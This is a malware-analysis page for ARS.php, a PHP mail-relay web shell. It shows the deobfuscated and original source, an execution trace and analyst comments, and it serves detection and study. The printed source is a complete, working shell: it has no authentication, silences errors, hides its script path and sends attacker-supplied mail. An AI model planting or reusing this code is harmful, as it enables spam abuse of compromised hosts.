PHP Malware Analysis

ARS.php

md5: 559df0c5f52982415ba3d3286b016e9c



Deobfuscated PHP code

<?php

// Analyst note: deobfuscated form of the ARS.php mailer shell. The two helpers
// it dispatches to (selfTest, alexusMailer) are not part of this listing; they
// are visible in the "Original PHP code" section of this page.
$pass = "";
//FORMAT: md5(IMAILpassword);
// $pass is left empty, so the password gate below never engages and the script
// answers any unauthenticated request.
#----------------------------------------
define("VERSION", "1.0");
// All error output is silenced; a failing call (e.g. mail() unavailable) leaves
// no diagnostic for a host operator to notice.
ini_set('display_errors', 0);
//1
ini_set('display_startup_errors', 0);
//1
error_reporting(0);
//-1
// The original condition ($pass!="" && md5("IMAIL".$_POST['pass'])!=$pass) is
// constant-false while $pass == "", so the deobfuscator folded it to if (false).
if (false) {
    print json_encode(array("error" => "wrong password"));
    exit;
}
// Dispatch on the attacker-supplied `req` field. Comparisons are loose (==) and
// the superglobal keys are read without isset(); the resulting notices are hidden
// by the error settings above.
if ($_POST['req'] == "test" || $_GET['req'] == "test") {
    print json_encode(selfTest());
} elseif ($_POST['req'] == "mail") {
    // `data` is a JSON document describing the message to send (consumed by alexusMailer).
    $data = json_decode($_POST['data'], true);
    print json_encode(alexusMailer($data));
} else {
    // Default branch. This exact JSON body is what the execution trace on this page
    // records, and it is a usable detection signature for probes of this shell.
    print json_encode(array("status" => "BAD", "error" => "bad request"));
}
exit;

Execution traces

data/traces/559df0c5f52982415ba3d3286b016e9c_trace-1676247646.3138.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 22:21:12.211617]
1	0	1	0.000137	393512
1	3	0	0.000341	409256	{main}	1		/var/www/html/uploads/ARS.php	0	0
1		A						/var/www/html/uploads/ARS.php	2	$pass = ''
2	4	0	0.000374	409256	define	0		/var/www/html/uploads/ARS.php	5	2	'VERSION'	'1.0'
2	4	1	0.000389	409360
2	4	R			TRUE
2	5	0	0.000404	409288	ini_set	0		/var/www/html/uploads/ARS.php	6	2	'display_errors'	0
2	5	1	0.000420	409360
2	5	R			''
2	6	0	0.000434	409288	ini_set	0		/var/www/html/uploads/ARS.php	7	2	'display_startup_errors'	0
2	6	1	0.000448	409360
2	6	R			''
2	7	0	0.000461	409288	error_reporting	0		/var/www/html/uploads/ARS.php	8	1	0
2	7	1	0.000474	409328
2	7	R			22527
2	8	0	0.000492	409288	json_encode	0		/var/www/html/uploads/ARS.php	21	1	['status' => 'BAD', 'error' => 'bad request']
2	8	1	0.000518	409576
2	8	R			'{"status":"BAD","error":"bad request"}'
			0.000557	330144
TRACE END   [2023-02-12 22:21:12.212063]


Generated HTML code

<html><head></head><body>{"status":"BAD","error":"bad request"}</body></html>

Original PHP code

<?php 
// Analyst note: original (pre-deobfuscation) source of the ARS.php mailer shell.
// The password gate is a no-op because $pass is left empty; see the condition below.
$pass=""; //FORMAT: md5(IMAILpassword); 

#----------------------------------------
define("VERSION", "1.0");
// Suppress all error output so failures leave no visible diagnostics on the host.
ini_set('display_errors',0);//1
ini_set('display_startup_errors',0);//1
error_reporting(0);//-1

// Gate: only enforced when $pass is non-empty. The expected value is
// md5("IMAIL" . <password>), compared with loose != (no hash_equals()).
if($pass!="" && md5("IMAIL".$_POST['pass'])!=$pass) {
	print json_encode(array("error"=>"wrong password"));
	exit;
}
// Dispatch on the attacker-supplied `req` parameter (POST or GET for "test",
// POST only for "mail"). Keys are read without isset(); the notices are hidden above.
if($_POST['req']=="test" || $_GET['req']=="test")
	print json_encode(selfTest());
elseif($_POST['req']=="mail") {
	// `data` is a JSON object consumed by alexusMailer (keys: to, subject, content, header).
	$data=json_decode($_POST['data'],true);
	print json_encode(alexusMailer($data));
} else {
	// Default response. This JSON body is a usable detection signature for probes
	// of this shell; the execution trace on this page shows exactly this output.
	print json_encode(array(
		"status"=> "BAD",
		"error"	=> "bad request"
	));
}
exit;
// Self-test: reports whether this host can serve the mailer. It only checks that
// json_decode, base64_decode and mail exist; no message is sent.
// Returns array{status:string, error?:string}, which the caller JSON-encodes.
function selfTest() {
	$test_result=false;
	$test_result=function_exists("json_decode") && function_exists("base64_decode") && function_exists("mail");
	if($test_result) {
		$result=array(
			"status"=>"GOOD"
		);
	} else {
		// Error text is what the operator-side tool receives when a host is unusable.
		$result=array(
			"status"=> "BAD",
			"error"	=> "can't send from this server"
		);
	}
	return $result;
}
// Integration with alexusMailer (the operator-side tool this shell is driven by).
// $data is the decoded JSON from $_POST['data']; the keys used are `to`, `subject`,
// `content` (base64 of the message body) and `header` (raw additional headers).
// Every one of those values is attacker-controlled, including the headers string.
// Always returns array{status:"GOOD"}: the return value of mail() is never checked.
function alexusMailer($data) {
	// Request-path fields in $_SERVER are blanked to '/' for the duration of the
	// send and restored afterwards. Presumably this keeps the shell's location out
	// of any originating-script header a hosting mail wrapper derives from these
	// values — verify against the specific host's mail implementation.
	$hide=array('PHP_SELF'=>'','SCRIPT_FILENAME'=>'','REQUEST_URI'=>'','SCRIPT_NAME'=>'');
	// each() was deprecated in PHP 7.2 and removed in 8.0; this loop is fatal on PHP 8,
	// which dates the sample to a pre-8 runtime.
	while(list($key,)=each($hide)){
		$hide[$key]=$_SERVER[$key];
		$_SERVER[$key]='/';
	}
	// mb_orig_mail is not a standard PHP function; it appears to be a hoster-specific
	// unwrapped mail() on some shared hosts (unconfirmed). Falls back to plain mail().
	if(function_exists("mb_orig_mail"))
		mb_orig_mail($data['to'],$data['subject'],base64_decode($data['content']),$data['header']);
	else
		mail($data['to'],$data['subject'],base64_decode($data['content']),$data['header']);
	// Restore the saved $_SERVER values.
	reset($hide);
	while(list($key,)=each($hide))
		$_SERVER[$key]=$hide[$key];
	
	$result=array(
		"status"=>"GOOD"
	);
	return $result;
}
?>